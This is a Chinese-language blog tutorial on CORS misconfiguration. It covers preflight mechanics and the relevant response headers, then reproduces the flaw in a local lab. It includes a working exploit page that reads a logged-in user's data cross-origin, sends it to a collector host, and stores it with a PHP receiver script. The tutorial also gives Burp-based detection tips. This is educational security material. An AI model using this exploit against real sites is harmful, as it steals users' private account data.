浅析CSRF跨域读取型漏洞之CORS

最新推荐文章于 2024-04-08 15:13:54 发布
最新推荐文章于 2024-04-08 15:13:54 发布
阅读量644 收藏 2
点赞数 3
分类专栏: # web安全 文章标签: csrf 网络安全 web安全 javascript 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/129393815
版权

目录

前提知识

CORS介绍

跨域访问的一些场景

跨域请求方式

漏洞原理

非简单请求的预检过程

安全隐患

漏洞复现

挖掘技巧

防御

前提知识

CORS介绍

H5提供的一种机制,WEB应用程序可以通过在HTTP增加字段来告诉浏览器,哪些不同来源的服务器是有权访问本站资源的,当不同域的请求发生时,就出现了跨域的现象。

跨域访问的一些场景

  1. 比如后端开发完一部分业务代码后,提供接口给前端用,在前后端分离的模式下,前后端的域名是不一致的,此时就会发生跨域访问的问题。
  2. 程序员在本地做开发,本地的文件夹并不是在一个域下面,当一个文件需要发送ajax请求,请求另外一个页面的内容的时候,就会跨域。
  3. 电商网站想通过用户浏览器加载第三方快递网站的物流信息。
  4. 子站域名希望调用主站域名的用户资料接口,并将数据显示出来。

跨域请求方式

CORS定义了两种跨域请求,简单跨域请求和非简单跨域请求。

只要同时满足以下两大条件,就属于简单请求。

  • 1.请求方法是以下三种方法之一
  • HEAD
  • GET
  • POST
  • 2.HTTP的头信息不超出以下几种字段
  • Accept
  • Accept-Language
  • Content-Language
  • Last-Event-ID
  • Content-Typeapplication/x-www-form-urlencodedmultipart/form-datatext/plain

浏览器对简单请求和非简单请求的处理机制不一样。对于简单请求,浏览器就会立刻发送这个请求。对于非简单请求,浏览器不会马上发送这个请求,而是有一个preflight,跟服务器验证的过程。浏览器先发送一个options方法的预检请求。

漏洞原理

非简单请求的预检过程

  1. 浏览器先发送一个options方法的请求。带有如下字段:
    Origin: 普通的HTTP请求也会带有,在CORS中专门作为Origin信息供后端比对,表明来源域。
    Access-Control-Request-Method: 接下来请求的方法,例如PUT, DELETE等等
    Access-Control-Request-Headers: 自定义的头部,所有用setRequestHeader方法设置的头部都将会以逗号隔开的形式包含在这个头中

  2. 然后如果服务器配置了cors,会返回对应对的字段,具体字段含义在返回结果是一并解释。
    Access-Control-Allow-Origin: 
    Access-Control-Allow-Methods:
    Access-Control-Allow-Headers:

  3. 然后浏览器再根据服务器的返回值判断是否发送非简单请求。简单请求前面讲过是直接发送,只是多加一个origin字段表明跨域请求的来源。然后服务器处理完请求之后,会再返回结果中加上如下控制字段:
    Access-Control-Allow-Origin: 允许跨域访问的域,可以是一个域的列表,也可以是通配符"*"。这里要注意Origin规则只对域名有效,并不会对子目录有效。即http://foo.example/subdir/ 是无效的。但是不同子域名需要分开设置,这里的规则可以参照同源策略
    Access-Control-Allow-Credentials: 是否允许请求带有验证信息,这部分将会在下面详细解释
    Access-Control-Expose-Headers: 允许脚本访问的返回头,请求成功后,脚本可以在XMLHttpRequest中访问这些头的信息(貌似webkit没有实现这个)
    Access-Control-Max-Age: 缓存此次请求的秒数。在这个时间范围内,所有同类型的请求都将不再发送预检请求而是直接使用此次返回的头作为判断依据,非常有用,大幅优化请求次数
    Access-Control-Allow-Methods: 允许使用的请求方法,以逗号隔开
    Access-Control-Allow-Headers: 允许自定义的头部,以逗号隔开,大小写不敏感

  4. 然后浏览器通过返回结果的这些控制字段来决定是将结果开放给客户端脚本读取还是屏蔽掉。如果服务器没有配置cors,返回结果没有控制字段,浏览器会屏蔽脚本对返回信息的读取。

安全隐患

这个流程中。服务器接收到跨域请求的时候,并没有先验证,而是先处理了请求。所以从某种程度上来说。在支持cors的浏览器上实现跨域的写资源,打破了传统同源策略下不能跨域读写资源。

如果将Access-Control-Allow-Origin设置为允许来自所有域的跨域请求。那么cors的安全机制几乎就无效了。但是这里在设计的时候有一个很好的限制。xmlhttprequest发送的请求需要使用“withCredentials”来带上cookie,如果一个目标域设置成了允许任意域的跨域请求,这个请求又带着cookie的话,这个请求是不合法的。(就是如果需要实现带cookie的跨域请求,需要明确的配置允许来源的域,使用任意域的配置是不合法的)浏览器会屏蔽掉返回的结果。

CORS服务端的 Access-Control-Allow-Origin 设置为了 *,并且 Access-Control-Allow-Credentials 设置为false,这样任何网站都可以获取该服务端的任何数据了。
有一些网站的Access-Control-Allow-Origin他的设置并不是固定的,而是根据用户跨域请求数据的Origin来定的。这时,不管Access-Control-Allow-Credentials 设置为了 true 还是 false。任何网站都可以发起请求,并读取对这些请求的响应。意思就是任何一个网站都可以发送跨域请求来获得CORS服务端上的数据。

漏洞复现

这里以droabox靶场为例,如图,这个接口会返回已登录的用户的信息数据,通过访问该网页的响应我们看到这里可能存在CORS跨域资源共享漏洞

恶意js代码

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Cors</title>
</head>
<body>
<script>
    function cors() {
        var xhr = new XMLHttpRequest();
        xhr.onreadystatechange = function () {
            if(xhr.readyState == 4){
                alert(xhr.responseText);
            }
        }
        // xhr.= twithCredentials rue;
        xhr.open("GET",'http://localhost:8999/csrf/userinfo.php');
        xhr.send();
    }
    cors();
</script>
</body>
</html>

漏洞利用代码

exp.html

</head>
<body>
<script>
    function cors() {
        var xhr = new XMLHttpRequest();
        var xhr1 = new XMLHttpRequest();
        xhr.onreadystatechange = function () {
            if(xhr.readyState == 4){
                alert(xhr.responseText)
                var data = xhr.responseText;
                xhr1.open("POST","http://127.0.0.1:8098/coleak.php",true);
                xhr1.setRequestHeader("Content-type","application/x-www-form-urlencoded");
                alert(data);
                xhr1.send("coleak="+escape(data));
                // body = document.getElementsByTagName('body')
                // body[0].innerHTML = xhr.responseText;
            }
        }
        //xhr.withCredentials = true;
        xhr.open("GET",'http://localhost:8999/csrf/userinfo.php');
        xhr.send();
    }
    cors();
</script>
</body>
</html>

coleak.php

<?php
$data = $_POST['coleak'];
if($data){
	$myfile = fopen("data.html","w");
	fwrite($myfile,$data);
	fclose($myfile);
}

此时生成data.html

挖掘技巧

在之前我们了解了一些关于CORS跨域资源共享通信的一些字段含义,CORS的漏洞主要看当我们发起的请求中带有Origin头部字段时,服务器的返回包带有CORS的相关字段并且允许Origin的域访问。
一般测试WEB漏洞都会用上BurpSuite,而BurpSuite可以实现帮助我们检测这个漏洞。
首先是自动在HTTP请求包中加上Origin的头部字段,打开BurpSuite,选择Proxy模块中的Options选项,找到Match and Replace这一栏,勾选Request header 将空替换为Origin:example.com的Enable框。
当我们进行测试时,看服务器响应头字段里可以关注这几个点:
最好利用的配置:
Access-Control-Allow-Origin: www
Access-Control-Allow-Credentials: true
可能存在可利用的配置:
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
很好的条件但无法利用:
下面这组配置组合虽然看起来很完美但是CORS机制已经默认自动禁止了这种组合,算是CORS的最后一道防线
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
单一的情况
Access-Control-Allow-Origin:*

防御

将下面设置改为设置白名单

coleak
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CORS资源共享漏洞
m0_55772907的博客
10-19 9086
cors漏洞
Nginx 代理解决问题分析
qigeminghao的博客
01-18 2009
当你遇到问题,不要立刻就选择复制去尝试。请详细看完这篇文章再处理 。我相信它能帮到你。 分析前准备: 前端网站地址:http://localhost:8080 服务端网址:http://localhost:59200 首先保证服务端是没有处理的,其次,先用postman测试服务端接口是正常的 当网站8080去访问服务端接口时,就产生了问题,那么如何解决?接下来我把遇到的各种情况都列举出来并通过nginx代理的方式解决(后台也是一样的,只要你理解的原理)。 主要涉及4个响.
Web常见十大漏洞.pdf
03-30
Web常见十大漏洞.pdf
访问漏洞原理以及修复方法
最新发布
it知识分享 free for nothing..
04-08 500
访问漏洞原理以及修复方法
Access-Control-Allow-Headers 列表中不存在请求标头
CherryCola_zjl的博客
11-10 3218
问题:请求,大部分浏览器都可以请求,部分(ie,ipone5/6等机,微信pc端)终端缺发不出请求。。。 原因:ie以及低版本Safari 等浏览器不支持请求时,后台配置Access-Control-Allow-Headers为* 解决办法:修改后台配置 response.setHeader(“Access-Control-Allow-Headers”, "authorization,Authorization,DNT,X-CustomHeader,“Keep-Alive,User-Agent
CORS资源共享漏洞复现——详细利用方法,漏洞危害最大化
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
06-15 4158
CORS资源共享漏洞漏洞复现,cors的利用方式以及让危害最大化。
CORS资源共享漏洞的复现、分析、利用及修复过程
热门推荐
weixin_46622976的博客
12-27 1万+
CORS漏洞测试
CORS访问漏洞
m0_73896875的博客
07-13 5086
全称是“资源访问共享”(Cross-Origin Resource Sharing),是一种用于解决资源访问限制的机制。它允许在浏览器中进行请求,并控制请求的安全性。同源策略(Same-Origin Policy)是浏览器的一种安全策略,它要求在访问资源时,请求的名、协议和端口必须与资源所在的名、协议和端口完全匹配。如果两个资源的名、协议和端口不匹配,浏览器会限制请求,并阻止脚本访问返回的响应数据。CORS 提供了一种机制,允许服务器端声明它所支持的请求。
CORSCSRF--学习笔记
weixin_45951911的博客
12-04 3841
一、CORSCSRF 区别 两者概念完全不同,另外常常我们也会看到 XSS ,这里一起介绍: CORS : Cross Origin Resourse-Sharing 站资源共享 CSRF : Cross-Site Request Forgery 站请求伪造 XSS : Cross Site Scrit 站脚本攻击(为与 CSS 区别,所以在安全领叫 XSS) 二、CORS 1、概念 来源资源共享(CORS),亦译为资源共享,是一份浏览器技术的规范,提供了 Web服
漏洞学习
02-01 1251
漏洞学习 同源策略 同源策略(Same origin policy)是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能都会受到影响。可以说Web是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现;同源策略是浏览器的行为,是为了保护本地数据不被JavaScript代码获取回来的数据污染,因此拦截的是客户端发出的请求回来的数据接收,即请求发送了,服务器响应了,但是无法被浏览器接收。—百度百科 是否同源要依据协议、名、端口是否相同来判断,名相同即ho
Django请求CSRF的方法示例
01-20
web请求 1.为什么要有限制 举个例子: 1.用户登录了自己的银行页面 http://mybank.com,http://mybank.com向用户的cookie中添加用户标识。 2.用户浏览了恶意页面 http://evil.com。执行了页面中的恶意AJAX...
基础漏洞csrf挖掘实战
10-07
这种攻击一般依赖于目标对象之前已经通过了具有漏洞的网站的身份认证,并且攻击者向该网站发起的提交动作和网站的响应不被目标对象感知。当CSRF攻击成功时,我们就可以修改服务器端信息并很有可能完全接管用户的账号。...
CSRF漏洞的靶场实验
09-19
靶场试炼
CSRF漏洞详细说明
02-26
经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。通常情况下,有三种方法被广泛用来防御CSRF攻击:验证token,验证...
hucart-含有CSRF漏洞的源码.zip
12-31
hucart-含有CSRF漏洞的源码,亲测真实有效可用,如有侵权,请联系CSDN管理员删除
浏览器 Access-Control-Allow-Headers 问题
m0_51513185的博客
09-20 259
Access-Control-Allow-Headers 当浏览器发送接口请求出现问题时,目前的做法通常会在接口服务器增加如下配置。 Access-Control-Allow-Origin: *但是有时也会出现 Access-Control-Allow-Headers 的错误问题。 Access to XMLHttpRequest at'http://www.xxx.com/api' from...
nginx请求,自定义Headers,Options拦截
帆酱的博客
02-18 6596
浏览器将CORS请求分为两类:简单请求(simple request)和非简单请求(not-simple-request),简单请求浏览器不会预检,而非简单请求会预检。 同时满足下列三大条件,就属于简单请求,否则属于非简单请求 1.请求方式只能是:GET、POST、HEAD 2.HTTP请求头限制这几种字段:Accept、Accept-Language、Content-Language、Content-Type、Last-Event-ID 3.Content-type只能取:application/
gin 解决 Access-Control-Allow-Headers 错误
秋雨夕照的博客
01-02 579
前后端分离开发,前端添加新的请求头 `"Access-Token"`,发送请求时报错: `Access to XMLHttpRequest at 'http://localhost:8080/api' from origin 'http://localhost:5432' has been blocked by CORS policy: Request header field access-token is not allowed by Access-Control-Allow-Headers in pr
修复cors资源共享漏洞
05-17
资源共享(CORS)是一种机制,它使用额外的 HTTP 头来告诉浏览器,当前页面上的脚本可以访问来自不同源的服务器上的资源。CORS 是一种重要的安全机制,它允许网页从不同的访问资源,但同时也会带来一些安全风险,如 CSRF 攻击。 要修复 CORS 漏洞,可以采取以下措施: 1. 限制请求的来源:可以在服务端设置 Access-Control-Allow-Origin 头来限制允许请求的来源,只允许指定的名或 IP 地址访问。这种方式可以有效地防止 CSRF 攻击。 2. 设置 Access-Control-Allow-Credentials:如果需要在请求中传递用户凭证,可以在服务端设置 Access-Control-Allow-Credentials 头,并将其值设置为 true。这样可以确保请求中的 Cookie 或 HTTP 认证信息可以正确地传递到服务器。 3. 设置 Access-Control-Allow-Methods:可以在服务端设置 Access-Control-Allow-Methods 头来限制允许请求的 HTTP 方法。 4. 设置 Access-Control-Allow-Headers:可以在服务端设置 Access-Control-Allow-Headers 头来限制允许请求的请求头。 5. 使用代理:可以使用服务器端代理来转发请求,这样可以规避浏览器的同源策略限制。 除了以上措施,还可以通过使用 CSP(内容安全策略)来限制请求和其他安全漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值